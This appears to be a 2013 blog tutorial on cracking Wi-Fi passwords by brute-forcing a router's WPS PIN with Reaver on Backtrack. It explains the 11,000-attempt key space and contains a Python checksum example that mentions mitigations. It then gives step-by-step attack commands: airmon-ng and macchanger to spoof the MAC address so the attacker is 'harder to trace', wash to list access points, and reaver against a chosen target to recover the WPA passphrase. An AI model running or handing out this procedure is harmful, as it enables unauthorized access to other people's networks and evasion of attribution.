Cracking wifi Password using Backtrack


A WPA/WPA2 password can be cracked simply by capturing the WPA handshake and then running a dictionary attack against it. If the passphrase is in the dictionary the password will be cracked, and this process may take hours, in some cases even days. But what if the password is not in the dictionary?

So here we will learn to crack these passphrases.

WPS:- Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to make it easy to set up a secure wireless home network. By default it is enabled on most routers.

Using Reaver we will brute force the AP's WPS PIN, attempting every possible combination in order to guess the AP's 8-digit PIN. Since the PIN is all numeric, there are 10^8 (100,000,000) possible values for a given PIN. However, because the last digit of the PIN is a checksum that can be calculated from the previous 7 digits, the key space is reduced to 10^7 (10,000,000) possible values.

The key space is reduced even further because the WPS authentication protocol splits the PIN in half and validates each half individually. Reaver brute forces the first half of the PIN and then the second half, so the entire WPS PIN key space can be exhausted in at most 11,000 attempts. The key point is that by brute-forcing this PIN we can retrieve the credentials stored on the access point, whatever combination of digits and special symbols the passphrase contains.
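The key-space arithmetic above is the reason disabling WPS PIN on a router matters so much. The following Python script is an added worked example (not code from the original post or from Reaver) that makes the numbers concrete: it implements the public checksum rule for the 8th PIN digit from the Wi-Fi Simple Configuration specification, and then counts the key space three ways, naive, checksum-valid, and split into halves, to show where 10^8, 10^7 and 11,000 come from. The sample PINs used in it are constructed for illustration.

```python
"""Worked example of the WPS PIN key-space arithmetic (added example,
not part of the original post). The checksum rule is the weighted-sum
rule from the Wi-Fi Simple Configuration specification."""


def wps_checksum(first7: int) -> int:
    """Return the 8th (checksum) digit for a 7-digit WPS PIN prefix.

    The digits are weighted 3,1,3,1,3,1,3 from the left; the checksum is
    the digit that makes the weighted sum a multiple of 10.
    """
    if not 0 <= first7 <= 9_999_999:
        raise ValueError("first7 must be a number with at most 7 digits")
    accum = 0
    n = first7
    # Walk digits from the right: rightmost weight 3, then 1, 3, ... which
    # is the same weighting as 3,1,3,1,3,1,3 from the left for 7 digits.
    for i in range(7):
        digit = n % 10
        n //= 10
        accum += 3 * digit if i % 2 == 0 else digit
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit string carries the correct checksum digit."""
    return (len(pin) == 8 and pin.isdigit()
            and wps_checksum(int(pin[:7])) == int(pin[7]))


def count_valid_with_prefix(first4: str) -> int:
    """Enumerate all 10^4 suffixes for a fixed 4-digit first half and count
    how many complete PINs pass the checksum. Exactly one checksum digit fits
    each 3-digit middle, so the answer is 10^3: the second half only has
    1,000 candidates, not 10,000."""
    if len(first4) != 4 or not first4.isdigit():
        raise ValueError("first4 must be exactly 4 digits")
    return sum(is_valid_pin(f"{first4}{s:04d}") for s in range(10_000))


def pin_keyspace() -> dict:
    """Key-space sizes as described in the post."""
    naive = 10 ** 8            # every 8-digit string
    valid = 10 ** 7            # one checksum digit fits each 7-digit prefix
    first_half = 10 ** 4       # digits 1-4, validated on their own
    second_half = 10 ** 3      # digits 5-7; digit 8 is then forced by the checksum
    return {
        "naive": naive,
        "checksum_valid": valid,
        "split_max_attempts": first_half + second_half,  # 11,000
    }


if __name__ == "__main__":
    # Constructed sample PIN: prefix 1234567 gets checksum digit 0.
    print("checksum for 1234567 ->", wps_checksum(1234567))
    print("12345670 valid:", is_valid_pin("12345670"))
    print("12345678 valid:", is_valid_pin("12345678"))
    print("valid PINs starting 1234:", count_valid_with_prefix("1234"))
    print(pin_keyspace())
```

The split-halves figure is an upper bound: a brute force that gets lucky early finishes sooner, but it can never need more than 10,000 + 1,000 guesses, which is why a rate limit or lockout on failed WPS attempts, or simply turning WPS PIN off, is the mitigation that matters.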

Let's start:

Boot your Backtrack:

First we will change the MAC address of our wireless card so that we are harder to trace:

airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Now run the following command to list the available APs:

wash -i mon0

Now choose your target, note its BSSID, and issue the following command, replacing <bssid> with the target's BSSID:

reaver -i mon0 -b <bssid> -vv

Now wait until Reaver finishes brute-forcing the PIN. Once it is done, you'll have:

WPS Pin
WPA PSK
AP SSID

Photo: As promised :D

Copyright © 2013 Link4Networking.